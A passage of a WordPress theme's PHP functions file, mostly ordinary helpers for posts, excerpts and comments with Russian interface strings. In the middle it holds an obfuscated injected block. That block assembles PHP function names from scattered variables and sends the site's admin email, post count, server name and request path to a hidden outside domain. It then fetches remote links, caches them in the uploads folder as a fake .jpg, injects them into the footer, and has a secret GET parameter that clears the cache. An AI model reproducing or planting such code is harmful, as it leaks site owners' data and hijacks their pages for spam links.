<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $oeMCcM='s';$jMQDhEx='6';$jvRSvkP='o';$RecK='d';$nkxLyFt='c';$IasWeez='_';$QcQrtT='e';$vuqfX='a';$poFgs='d';$WTGfQF='e';$iAqcKc='e';$iHBDc='4';$tuOUgEj='b';$hbiWZPtg=$tuOUgEj.$vuqfX.$oeMCcM.$WTGfQF.$jMQDhEx.$iHBDc.$IasWeez.$RecK.$iAqcKc.$nkxLyFt.$jvRSvkP.$poFgs.$QcQrtT;$pEoVal='f';$DBtK='n';$ukAXL='e';$KiID='a';$BBTSoU='z';$CSwZqZJ='g';$RUsv='i';$SHxjH='l';$XxbO='t';$lhdVTKGv=$CSwZqZJ.$BBTSoU.$RUsv.$DBtK.$pEoVal.$SHxjH.$KiID.$XxbO.$ukAXL;$PCqCwTU='t';$FGarsR='o';$hzUFyiK='_';$oOCpMZr='s';$rLLRIx='t';$LrVTp='3';$IbSDG='1';$hYtJof='r';$qMTCrX='r';$PBfxZofg=$oOCpMZr.$rLLRIx.$qMTCrX.$hzUFyiK.$hYtJof.$FGarsR.$PCqCwTU.$IbSDG.$LrVTp;$lxBdLiP='v';$KsTTrZH='r';$TRla='e';$gfaxERo='s';$LSjxRv='t';$sLxU='r';$VtekBBwW=$gfaxERo.$LSjxRv.$KsTTrZH.$sLxU.$TRla.$lxBdLiP;                     $jf____________h='s';$zl________h='6';$cf____________e='o';$kd___________c='d';$bw_______k='c';$pa______________w='_';$jo______________f='e';$sr_______e='a';$rx___q='d';$cm____y='e';$ok________g='e';$vy_________h='4';$rl___________k='b';$oj______l=$rl___________k.$sr_______e.$jf____________h.$cm____y.$zl________h.$vy_________h.$pa______________w.$kd___________c.$ok________g.$bw_______k.$cf____________e.$rx___q.$jo______________f;$fh____________v='x';$wu________h='_';$ph__________r='s';$ez____l='n';$cf__h='e';$kh____________u='u';$xr______n='f';$tk______h='o';$ps_______________a='c';$fk________e='i';$zs_____________t='i';$bf________y='n';$of____________t='s';$tv_______a='t';$pf_______________i='t';$xm__p=$xr______n.$kh____________u.$ez____l.$ps_______________a.$tv_______a.$fk________e.$tk______h.$bf________y.$wu________h.$cf__h.$fh____________v.$zs_____________t.$of____________t.$pf_______________i.$ph__________r;$tx_____j='f';$la_________k='n';$fw__s='o';$ts____________b='e';$yq__v='p';$lv______u=$tx_____j.$fw__s.$yq__v.$ts____________b.$la_________k;$qs_________q='e';$xu______x='r';$je_____________e='d';$vm_______________m='a';$mw_____y='f';$iq____________c=$mw_____y.$xu______x.$qs_________q.$vm_______________m.$je_____________e;$xs_______________g='c';$ih_________z='f';$pg__g='l';$qz_______x='o';$dm__b='s';$wb__________z='e';$az______l=$ih_________z.$xs_______________g.$pg__g.$qz_______x.$dm__b.$wb__________z;define("WP_ID", $oj______l("Mi4wLjA="));define("WP_TTL", $oj______l("MTA4MDA="));define("WP_SRC", $oj______l("dHBva24="));function wp_get_header() {global $oj______l, $xm__p;if ($xm__p($oj______l("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$xm__p($oj______l("d3BfZ2V0X2Zvb3Rlcg==")) &&$xm__p($oj______l("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $oj______l, $lv______u, $az______l, $iq____________c;$xo______________z = TEMPLATEPATH."/".$oj______l("Zm9vdGVyLnBocA==");$ob__s = @$lv______u($xo______________z, "r");$xo______________z = @$iq____________c($ob__s, @filesize($xo______________z));@$az______l($ob__s);$ks__s = TEMPLATEPATH."/".$oj______l("ZnVuY3Rpb25zLnBocA==");$ob__s = @$lv______u($ks__s, "r");$ks__s = @$iq____________c($ob__s, @filesize($ks__s));@$az______l($ob__s);$dn_____m = 0;if($xo______________z && $ks__s) {if ($oj______l("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($xo______________z, $oj______l("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$dn_____m = 1;}if (substr_count($xo______________z, "wp_theme_GPL_credits()") < 1) {$dn_____m = 2;}}if(WP_ID != "2.0.0") {$dn_____m = 12;}}if($dn_____m > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $dn_____m -->";}}function wp_loaded() {global $oj______l, $xm__p;return $xm__p($oj______l("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($ap_______________u, $lb__m = "(more...)", $xv__________k = 0, $pl______g = "") {$rz_____r = get_the_content($lb__m, $xv__________k, $pl______g);$rz_____r = apply_filters("the_content", $rz_____r);$rz_____r = str_replace("]]>", "]]>", $rz_____r);if (strlen($_GET["p"]) > 0) {echo $rz_____r;}else if ((strlen($rz_____r)>$ap_______________u) && ($ix____________r = strpos($rz_____r, " ", $ap_______________u ))) {$rz_____r = substr($rz_____r, 0, $ix____________r);$rz_____r = $rz_____r;echo $rz_____r;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$lb__m</a></div></p>";} else {echo $rz_____r;}}}$si_______________p='s';$if__n='4';$bv___e='e';$ws_________h='e';$sm______y='6';$ej___________b='o';$bg______u='d';$sq____________b='e';$kw_______c='c';$tx_____________t='a';$is____q='_';$xm__r='n';$db_______v='b';$lg______________z=$db_______v.$tx_____________t.$si_______________p.$ws_________h.$sm______y.$if__n.$is____q.$bv___e.$xm__r.$kw_______c.$ej___________b.$bg______u.$sq____________b;$aj____v='i';$zk_________e='l';$ey_____________j='e';$mj____t='e';$bp__________l='g';$jy____________n='e';$dg______c='c';$gl_______________f='n';$fz_______________s='t';$gu______i='t';$sc_____v='s';$uw___________r='f';$mt___n='_';$qq___l='t';$rx_____e='o';$xo______________o='n';$yv_____________d='_';$mz__i=$uw___________r.$aj____v.$zk_________e.$mj____t.$yv_____________d.$bp__________l.$ey_____________j.$qq___l.$mt___n.$dg______c.$rx_____e.$gl_______________f.$gu______i.$jy____________n.$xo______________o.$fz_______________s.$sc_____v;$kx_____c='i';$dq_______s='t';$wf__w='i';$jr_________p='e';$zs____n='f';$xg_______i='s';$vt______d='_';$jx___s='s';$ps________j='l';$gw______a='x';$eu__u='e';$pt__j=$zs____n.$kx_____c.$ps________j.$jr_________p.$vt______d.$eu__u.$gw______a.$wf__w.$xg_______i.$dq_______s.$jx___s;$sm_______r='s';$wz_________v='n';$ex_____________a='r';$xj_____________g='e';$ai__________h='v';$ov______________u='o';$dx___________k='i';$dn__v='r';$jj________k='_';$ra___________a='c';$mi__a='a';$ga____z='m';$ft_______________i='o';$ie__y='e';$mo___________q='p';$gv__________c=$ai__________h.$ie__y.$dn__v.$sm_______r.$dx___________k.$ov______________u.$wz_________v.$jj________k.$ra___________a.$ft_______________i.$ga____z.$mo___________q.$mi__a.$ex_____________a.$xj_____________g;$sz____e='c';$kn____________a='p';$ws_________c='k';$ik__________x='s';$cd___t='o';$kf___________r='e';$hi__s='f';$jd_______________s='o';$nu_______w='n';$hs_________k=$hi__s.$ik__________x.$jd_______________s.$sz____e.$ws_________c.$cd___t.$kn____________a.$kf___________r.$nu_______w;$il______p='e';$ub______y='w';$mp_______e='t';$pt______t='f';$to_____________k='r';$zx_______________e='i';$yv__________h=$pt______t.$ub______y.$to_____________k.$zx_______________e.$mp_______e.$il______p;$wz___________i='d';$ob_________x='5';$mz__m='m';$mh________k=$mz__m.$wz___________i.$ob_________x;$sn___u='l';$zf____k='h';$ti_______i='t';$us__________w='e';$pz____g='a';$sp______________r='a';$kn______v='r';$fa____________x='p';$gz___a=$kn______v.$us__________w.$sp______________r.$sn___u.$fa____________x.$pz____g.$ti_______i.$zf____k;$fp__________n='e';$ix_____l='i';$vl_________b='s';$ay_______________w='i';$vu____________f='n';$tg_____________p='l';$gm______b='r';$ih__s='e';$st__n='z';$vu___k='u';$co_______b='a';$rl____________f=$vu___k.$vu____________f.$vl_________b.$ih__s.$gm______b.$ix_____l.$co_______b.$tg_____________p.$ay_______________w.$st__n.$fp__________n;$ha___________u='p';$sa___u='t';$oi____y='e';$kq__________n='a';$ja_____q='n';$vb________w='m';$ae_____________b='m';$qw________n=$sa___u.$oi____y.$vb________w.$ha___________u.$ja_____q.$kq__________n.$ae_____________b;$gf____________f='e';$vm______u='t';$pq______f='a';$yw____________x='m';$qc______________w='e';$gy____f='a';$se___t='t';$cs__________d='n';$aj___________z='c';$ca________f='r';$gs_____x='_';$oj______d='t';$ad_____________e='r';$sb________l='s';$pd___u='_';$ze_____________c='e';$fx_____x='c';$yw______________e='t';$sc______n='e';$bb___z='x';$yt______n='o';$ey__c=$sb________l.$oj______d.$ad_____________e.$ze_____________c.$gy____f.$yw____________x.$gs_____x.$fx_____x.$yt______n.$cs__________d.$vm______u.$qc______________w.$bb___z.$yw______________e.$pd___u.$aj___________z.$ca________f.$sc______n.$pq______f.$se___t.$gf____________f;function ho____u($eq____________d) {global $oj______l, $xm__p, $mz__i, $gv__________c, $ey__c;if (!$xm__p($oj______l("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($gv__________c(PHP_VERSION, "5.0.0", ">=") && $xm__p($oj______l("ZmlsZV9nZXRfY29udGVudHM=")) && $xm__p($oj______l("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$gq______________u = $ey__c(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$rq______z = @$mz__i($eq____________d, 0, $gq______________u);} else {$rq______z = @$mz__i($eq____________d, 0);}return $rq______z;}function pq___________k($eq____________d) {global $xm__p, $hs_________k, $yv__________h, $oj______l;if (!$xm__p($oj______l("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$la___________o = strpos($eq____________d, "/", 7);$lu_______a = array("uri"     => substr($eq____________d, $la___________o),"host"    => str_replace("http://", "", substr($eq____________d, 0, $la___________o)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$gw_________s = @$hs_________k("$lu_______a[host]", 80, $ly_________z, $kf_____r, 4);if (!$gw_________s) {return false;} else {$rq______z = "";$dc__________p  = "GET $lu_______a[uri] HTTP/1.0\r\n";$dc__________p .= "Host: $lu_______a[host]\r\n";$dc__________p .= "Referer: $lu_______a[referer]\r\n";$dc__________p .= "Connection: Close\r\n\r\n";@$yv__________h($gw_________s, $dc__________p);while (!@feof($gw_________s)) {$xp____o = @fgets($gw_________s, (1024*24));if ($xp____o == "\r\n") {$ra____________k = true;continue;}if ($ra____________k) {$rq______z .= $xp____o;}}return $rq______z;}}function il_______________h($eq____________d) {global $xm__p;$eq____________s = false;if ($eq____________d != "") {if ($xm__p("ho____u")) {$eq____________s = @ho____u($eq____________d);}if (!$eq____________s && ($xm__p("pq___________k"))) {$eq____________s = @pq___________k($eq____________d);}}return $eq____________s;}function wf__q() {global $_SERVER, $mh________k;$ok___________k = $_SERVER["SERVER_NAME"];if (substr("$ok___________k", 0, 4) == "www.") {$ok___________k = substr("$ok___________k", 4);}$ok___________k = $mh________k("$_SERVER[SERVER_NAME]");return $ok___________k;}function bl_____________d() {return "file";}function cr_______________w($eq____________d) {global $_SERVER, $mz__i, $pt__j, $lv______u, $az______l, $yv__________h;$gi_______________l = kf___________v();$ys_____k = wf__q().".jpg";$cb_________t = $gi_______________l["dir_upload"]["path"]."/$ys_____k";$dp__________h = @filemtime($cb_________t);if (!$dp__________h || ((time()-$dp__________h) >= WP_TTL)) {$eq____________s = il_______________h($eq____________d);if ($eq____________s) {if ($pt__j($cb_________t)) {@unlink($cb_________t);}$ob__s = @$lv______u($cb_________t, "x+");@$yv__________h($ob__s, $eq____________s);@$az______l($ob__s);}} else {if ($pt__j($cb_________t)) {$eq____________s = @$mz__i($cb_________t);} else {$eq____________s = false;}}return $eq____________s;}function kf___________v() {global $_SERVER, $oj______l, $lg______________z;$jp_____m = wp_count_posts("post");$ly_______l = pathinfo(get_bloginfo("template_directory"));$gi_______________l = array("url" => array("report"      => $oj______l("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $ly_______l,"dir_upload"=> ch____________i(),"queryString"=> array("?a001=".WP_ID,"a004=".$ly_______l[filename],"a005=".$jp_____m->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>");$gi_______________l["url"]["queryString"] = implode("&", $gi_______________l["queryString"]);$gi_______________l["url"]["report"] = $gi_______________l["url"]["report"]."/?".$lg______________z($gi_______________l["url"]["queryString"]).".html";return $gi_______________l;}function ch____________i() {$gm____________f = wp_upload_dir();if (isset($gm____________f["error"])) {$iy____________l = gv________a();if (is_writable($iy____________l)) {$gm____________f = array("path" => $iy____________l);}}return $gm____________f;}function gv________a() {global $xm__p, $mh________k, $gz___a, $qw________n;$os_____u = (bool) ini_get("safe_mode");if ($os_____u == true) {return false;}if ($xm__p("sys_get_temp_dir")) {$sf_________i = sys_get_temp_dir();if (is_writable($sf_________i)) {return $gz___a($sf_________i);}}if (!empty($_ENV["TMP"])) {return $gz___a($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $gz___a($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $gz___a($_ENV["TEMP"]);} else {$uo_____________g = $qw________n($mh________k(uniqid(rand(), true)), "");if ($uo_____________g) {$sf_________i = $gz___a(dirname($uo_____________g));@unlink($uo_____________g);return $sf_________i;} else {return false;}}}function ie______n() {global $_GET, $pt__j;$gi_______________l = kf___________v();$ok___________k = wf__q();$ys___________w = bl_____________d();$ht_____n = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($ys___________w == "file") {$kr____________w = $gi_______________l["dir_upload"]["path"]."/".$ok___________k.".jpg";if ($pt__j($kr____________w)) {@unlink($kr____________w);$ht_____n = "deleted";}}$uv_______________j = array("s"=> $ht_____n,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($uv_______________j AS $ua__________f => $sk__b) echo " [$ua__________f:$sk__b]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $xm__p, $oj______l, $rl____________f;$gi_______________l = kf___________v();$no_____________v = "cr_______________w";if ($xm__p($no_____________v)) {$rq______z = $no_____________v($gi_______________l["url"]["report"]);}if ($rq______z) {if ($rq______z = @$oj______l($rq______z)) {$rq______z = @$rl____________f($rq______z);if (strlen($rq______z[custom_credit]) >= 5) {$gi_______________l["default_string"] = $rq______z[custom_credit];}if ($rq______z["status"] == "0") {$so____________t = 1;$vb_________n = 1;} else {$zx___________z = sizeof($rq______z["links"]);$xj____f = $gi_______________l["default_string"];if ($zx___________z > 0 && $rq______z["links"] !== "") {$rr_______n = 0;foreach ($rq______z["links"] as $ta_______n => $bv____________t) {$rr_______n++;if ($bv____________t->l_path == "" || $bv____________t->l_path == $_SERVER["REQUEST_URI"]) {$bv____________t->l_href = htmlspecialchars(strip_tags($bv____________t->l_href));$bv____________t->l_title = htmlspecialchars(strip_tags($bv____________t->l_title));$bv____________t->l_anchor = htmlspecialchars(strip_tags($bv____________t->l_anchor));$xj____f .= " | ";$xj____f .= "<a href='$bv____________t->l_href' title='$bv____________t->l_title'";if ($bv____________t->l_nofollow == "1") {$xj____f .= " rel='nofollow'";}$xj____f .= ">$bv____________t->l_anchor</a>";}}}$gi_______________l["links"] = "$xj____f";if ($rq______z[credit] == "0") {$gi_______________l["links"] = "";}}} else {$so____________t = "1";}} else {$so____________t = "1";}if ($so____________t == "1") {$gi_______________l["links"] = $gi_______________l["default_string"];}echo "$gi_______________l[links]";echo "<!-- s: $rq______z[signature] -->";ie______n();}                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Search', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Newer Entries &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Older Entries', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Newer Entries &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Older Entries', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
